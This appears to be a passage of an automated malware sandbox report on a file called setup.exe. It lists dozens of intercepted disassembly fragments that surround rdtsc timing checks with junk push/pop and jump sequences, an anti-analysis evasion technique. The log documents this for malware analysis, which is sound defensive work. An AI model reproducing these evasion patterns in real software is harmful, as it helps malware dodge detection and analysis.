                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E00C3 second address: 50E0139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 push edi 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007FC16945A283h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FC16945A284h 0x00000019 sub ecx, 7E877048h 0x0000001f jmp 00007FC16945A27Bh 0x00000024 popfd 0x00000025 jmp 00007FC16945A288h 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007FC16945A27Bh 0x00000031 xchg eax, ebx 0x00000032 pushad 0x00000033 mov bx, ax 0x00000036 push eax 0x00000037 push edx 0x00000038 mov ebx, ecx 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0139 second address: 50E016F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebx, dword ptr [ebp+10h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pop esi 0x0000000e pop edx 0x0000000f mov ax, 86D9h 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 pushad 0x00000016 mov cx, 3811h 0x0000001a mov edx, eax 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC169461AA6h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E016F second address: 50E018A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 6C5D7986h 0x00000012 mov dl, A8h 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E018A second address: 50E01B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461A9Dh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E01B9 second address: 50E0205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC16945A287h 0x00000009 sbb cx, 6E1Eh 0x0000000e jmp 00007FC16945A289h 0x00000013 popfd 0x00000014 mov ecx, 34299BE7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov dx, 298Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0205 second address: 50E020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E020A second address: 50E0286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC16945A27Ch 0x00000009 adc cl, 00000048h 0x0000000c jmp 00007FC16945A27Bh 0x00000011 popfd 0x00000012 call 00007FC16945A288h 0x00000017 pop eax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007FC16945A280h 0x00000021 xchg eax, edi 0x00000022 pushad 0x00000023 mov esi, 29A2926Dh 0x00000028 call 00007FC16945A27Ah 0x0000002d mov bh, cl 0x0000002f pop edi 0x00000030 popad 0x00000031 test esi, esi 0x00000033 jmp 00007FC16945A27Ah 0x00000038 je 00007FC1DB2A8614h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 mov cl, dh 0x00000043 mov bx, cx 0x00000046 popad 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0286 second address: 50E02FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007FC169461A9Dh 0x0000000c sbb esi, 192FF9D6h 0x00000012 jmp 00007FC169461AA1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 jmp 00007FC169461A9Eh 0x00000027 je 00007FC1DB2AFDF7h 0x0000002d jmp 00007FC169461AA0h 0x00000032 mov edx, dword ptr [esi+44h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FC169461AA7h 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E02FC second address: 50E0301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0301 second address: 50E032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c or edx, dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC169461A9Dh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E032F second address: 50E0354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov si, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC16945A281h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0354 second address: 50E03C6 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 mov si, dx 0x0000000a pop edx 0x0000000b popad 0x0000000c jne 00007FC1DB2AFDBEh 0x00000012 pushad 0x00000013 popad 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 jmp 00007FC169461AA9h 0x0000001d jne 00007FC1DB2AFDB2h 0x00000023 pushad 0x00000024 jmp 00007FC169461A9Ch 0x00000029 pushfd 0x0000002a jmp 00007FC169461AA2h 0x0000002f xor ax, 8638h 0x00000034 jmp 00007FC169461A9Bh 0x00000039 popfd 0x0000003a popad 0x0000003b test bl, 00000007h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E03C6 second address: 50E03CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E03CA second address: 50E03E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0882 second address: 50D08C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC16945A27Eh 0x00000010 and esp, FFFFFFF8h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC16945A287h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D08C3 second address: 50D08E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D08E7 second address: 50D08EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D08EB second address: 50D08F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D08F1 second address: 50D090E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A282h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D090E second address: 50D0912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0912 second address: 50D0916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0916 second address: 50D091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D091C second address: 50D0922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0922 second address: 50D0966 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, AEh 0x00000011 pushfd 0x00000012 jmp 00007FC169461AA4h 0x00000017 or ax, 7B98h 0x0000001c jmp 00007FC169461A9Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0966 second address: 50D09C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC16945A283h 0x00000013 adc esi, 244621BEh 0x00000019 jmp 00007FC16945A289h 0x0000001e popfd 0x0000001f mov eax, 29292307h 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D09C1 second address: 50D0A17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC169461AA3h 0x00000009 adc cx, C3CEh 0x0000000e jmp 00007FC169461AA9h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC169461AA8h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0A17 second address: 50D0A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 3853h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC16945A285h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0A39 second address: 50D0A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FC169461A9Eh 0x00000011 sub ebx, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FC169461A9Ah 0x0000001c add eax, 061DFB68h 0x00000022 jmp 00007FC169461A9Bh 0x00000027 popfd 0x00000028 mov di, ax 0x0000002b popad 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0A85 second address: 50D0ABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A285h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FC16945A27Eh 0x00000010 je 00007FC1DB2AFB56h 0x00000016 pushad 0x00000017 pushad 0x00000018 mov esi, 0D2667D3h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0ABD second address: 50D0B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 mov dl, 50h 0x00000008 pop esi 0x00000009 popad 0x0000000a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000011 jmp 00007FC169461A9Dh 0x00000016 mov ecx, esi 0x00000018 pushad 0x00000019 jmp 00007FC169461A9Ch 0x0000001e mov eax, 794EB421h 0x00000023 popad 0x00000024 je 00007FC1DB2B7349h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC169461AA3h 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0B0B second address: 50D0BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC16945A27Fh 0x00000009 add esi, 0FBCA77Eh 0x0000000f jmp 00007FC16945A289h 0x00000014 popfd 0x00000015 mov ch, 5Dh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test byte ptr [76FB6968h], 00000002h 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FC16945A289h 0x00000028 sub eax, 0012CC66h 0x0000002e jmp 00007FC16945A281h 0x00000033 popfd 0x00000034 movzx esi, di 0x00000037 popad 0x00000038 jne 00007FC1DB2AFAABh 0x0000003e pushad 0x0000003f mov bx, 0A1Ch 0x00000043 pushfd 0x00000044 jmp 00007FC16945A285h 0x00000049 and ch, 00000076h 0x0000004c jmp 00007FC16945A281h 0x00000051 popfd 0x00000052 popad 0x00000053 mov edx, dword ptr [ebp+0Ch] 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FC16945A27Dh 0x0000005d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0BCA second address: 50D0BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0BCF second address: 50D0C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC16945A27Dh 0x0000000a or cl, FFFFFF86h 0x0000000d jmp 00007FC16945A281h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 pushad 0x00000019 call 00007FC16945A27Ah 0x0000001e pop eax 0x0000001f push ebx 0x00000020 pop ecx 0x00000021 popad 0x00000022 push ebx 0x00000023 mov ecx, 3C8DCE79h 0x00000028 pop esi 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC16945A27Bh 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0C20 second address: 50D0CB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FC169461A9Eh 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov esi, 2AA8293Dh 0x00000016 pushfd 0x00000017 jmp 00007FC169461A9Ah 0x0000001c adc si, 6B18h 0x00000021 jmp 00007FC169461A9Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007FC169461AA9h 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 pushad 0x00000031 movzx esi, di 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 popad 0x00000038 push dword ptr [ebp+14h] 0x0000003b jmp 00007FC169461AA7h 0x00000040 push dword ptr [ebp+10h] 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0CB7 second address: 50D0CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0CBB second address: 50D0CC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0D3E second address: 50D0D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, CBh 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0D50 second address: 50D0D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0D54 second address: 50D0D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0D58 second address: 50D0D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0D5E second address: 50D0D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0D64 second address: 50D0D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0D99 second address: 50E0E30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A287h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC16945A284h 0x00000011 sub ecx, 21AAC2F8h 0x00000017 jmp 00007FC16945A27Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FC16945A288h 0x00000023 adc ah, 00000058h 0x00000026 jmp 00007FC16945A27Bh 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f push esi 0x00000030 movsx edx, cx 0x00000033 pop eax 0x00000034 popad 0x00000035 xchg eax, ebp 0x00000036 jmp 00007FC16945A289h 0x0000003b mov ebp, esp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0E30 second address: 50E0E43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0E43 second address: 50E0E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0E49 second address: 50E0E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0B3D second address: 50E0B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0B41 second address: 50E0B54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0B54 second address: 50E0B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, si 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC16945A280h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51606CF second address: 51606D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51606D5 second address: 51606D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51606D9 second address: 51606DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5150A96 second address: 5150A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515090C second address: 5150912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5150912 second address: 5150916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5150916 second address: 515091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515091A second address: 5150966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FC16945A27Fh 0x00000010 mov ebp, esp 0x00000012 jmp 00007FC16945A286h 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC16945A287h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5150966 second address: 515096C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F01FB second address: 50F0216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A287h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0216 second address: 50F0232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC169461AA1h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0232 second address: 50F0261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov esi, 23BE3273h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov edi, esi 0x00000018 mov cx, 9E63h 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0261 second address: 50F0268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0268 second address: 50F026D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5150CC3 second address: 5150D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, BD3Ah 0x00000007 pushfd 0x00000008 jmp 00007FC169461A9Bh 0x0000000d or ah, FFFFFFDEh 0x00000010 jmp 00007FC169461AA9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov dx, 68F2h 0x0000001f call 00007FC169461AA3h 0x00000024 mov esi, 7954F78Fh 0x00000029 pop eax 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c jmp 00007FC169461A9Bh 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FC169461A9Bh 0x0000003c adc esi, 559A244Eh 0x00000042 jmp 00007FC169461AA9h 0x00000047 popfd 0x00000048 mov bx, si 0x0000004b popad 0x0000004c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5150D57 second address: 5150DB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FC16945A27Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FC16945A280h 0x00000019 push 4B8DDD49h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FC16945A27Ah 0x00000026 call 00007FC16945A282h 0x0000002b pop ecx 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5150DF0 second address: 5150DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5150DFF second address: 5150E86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC16945A27Ch 0x00000013 add si, 2CA8h 0x00000018 jmp 00007FC16945A27Bh 0x0000001d popfd 0x0000001e call 00007FC16945A288h 0x00000023 pushfd 0x00000024 jmp 00007FC16945A282h 0x00000029 and cx, 5A38h 0x0000002e jmp 00007FC16945A27Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov eax, 6CE14667h 0x0000003f popad 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100726 second address: 510072C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 510072C second address: 5100732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100732 second address: 5100753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FC169461AA0h 0x00000011 pop eax 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 rdtsc
